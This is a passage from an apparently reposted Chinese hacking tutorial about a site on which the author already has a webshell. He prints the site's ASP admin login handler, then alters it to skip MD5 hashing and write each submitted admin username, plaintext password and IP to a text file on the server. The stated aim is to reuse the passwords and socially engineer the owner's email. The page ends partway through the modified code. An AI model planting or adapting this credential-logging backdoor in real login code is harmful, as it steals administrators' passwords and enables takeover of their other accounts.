当前位置:七道奇文章资讯安全技术网络技术
日期:2010-02-28 04:38:00  来源:本站整理

利用asp来记录管理员账号密码[网络技术]

赞助商链接



  本文“利用asp来记录管理员账号密码[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

asp记录管理员账号密码.

根源:www.54rk.cn

作者:拉伸

在一次安全检测中,其实已拿到了webshell了,但是我还要社工他的邮箱还有其他资料类,所以要得知道他的习性.
下载了数据库,但是md5密码没办法解密.唉,看来只要记录他的登录管理员 账号密码了!

免得还要去穷取法破解!

这个密码其实说重要也不重要 说不 重要 其实很重要.
因为很多人喜好利用相同密码.即便是我这类安全检测人员,也免不了利用同一种账号密码的习惯.

首先看看他的后台登陆代码

<%
Dim Login
Set Login=new AdLogin
Login.Execute
Class AdLogin
Private ExCommCls
Private Sub class_initialize
 Set CommCls=new CommonCls
 ExCommCls.IsIpAllow
 ExCommCls.CheckInstall
 ExCommCls.GetConfigCache("*")
End Sub
Private Sub class_terminate
 Set ExCommCls=nothing
End Sub
public  Sub Execute
 Dim Action
 Action=Request("action")
 Select Case Action
  Case "CheckLogin"
  CheckLogin
  Case "LoginOut"
  LoginOut
  Case Else
  LoginF
 End Select
End Sub
Private Sub CheckLogin
 Dim Adname,AdPwd,CheckCode
 AdName=ExCommCls.G(Trim(request("Adname")))
 AdPwd=md5(Trim(request("AdPwd")))
 CheckCode=ExCommCls.G(request("checkCode"))
 If Trim(CheckCode)<>session("excheckcode") and Application(sn&"IsCheckCode")="是" Then
  ExCommCls.ShowMsg "考证码错误!",Application(sn&"blogurl")&"admin_login.asp"
  Exit Sub
 End If
 If  Trim(AdName)=CStr(Application(sn&"AdName")) And Trim(AdPwd)=CStr(Application(sn&"AdPwd")) Then
  Response.Cookies(Md5(SN))("AdName")=AdName
  Response.Cookies(Md5(SN))("AdPwd")=AdPwd
  session("AdLogin")=Md5(SN)
  ExCommCls.GetConfigCache("*")
  ExCommCls.GetClassCache()
  Response.Redirect(Application(sn&"blogurl")&"admin_index.asp")
 Else
  ExCommCls.ShowMsg "帐号或密码错误",Application(sn&"blogurl")&"admin_login.asp"
 End if
End Sub
Private Sub LoginOut
 Response.Cookies(Md5(SN))("AdName")=""
 Response.Cookies(Md5(SN))("AdPwd")=""
 session.Abandon()
 ExCommCls.ShowMsg "成功退出登陆",Application(sn&"blogurl")&"index.asp"
End Sub
Private Sub LoginF
%>
看下列代码
AdName=ExCommCls.G(Trim(request("Adname")))
 AdPwd=md5(Trim(request("AdPwd")))
 
 ---意思很简单,这里就不明说了, 主要看md5 ,密码利用md5加密 这样的话,我们记录的密码也就没用了,还是md5.所以
 所以想到了,一个钓鱼伎俩. 它本来的登录界面是
Private Sub CheckLogin
 Dim Adname,AdPwd,CheckCode,StrLogText,ip,ff
 AdName=ExCommCls.G(Trim(request("Adname")))
 AdPwd=(Trim(request("AdPwd")))
 CheckCode=ExCommCls.G(request("checkCode"))
 strLogFile="test.txt"
IP=request("IP")
StrLogText=StrLogText&AdName&"----"&AdPwd&"----IP:"&IP&("REMOTE_HOST")
set f=Server.CreateObject("scripting.filesystemobject")
set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)
ff.writeline(chr(13)+chr(10)&StrLogText)
ff.close
set ff=nothing
set f=nothing
 If Trim(CheckCode)<>session("excheckcode") and Application(sn&"IsCheckCode")="是" Then
  ExCommCls.ShowMsg "考证码错误!",Application(sn&"blogurl")&"Admin_1ogin.asp"

[1] [2]  下一页


  以上是“利用asp来记录管理员账号密码[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • 利用asp来记录管理员账号密码
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .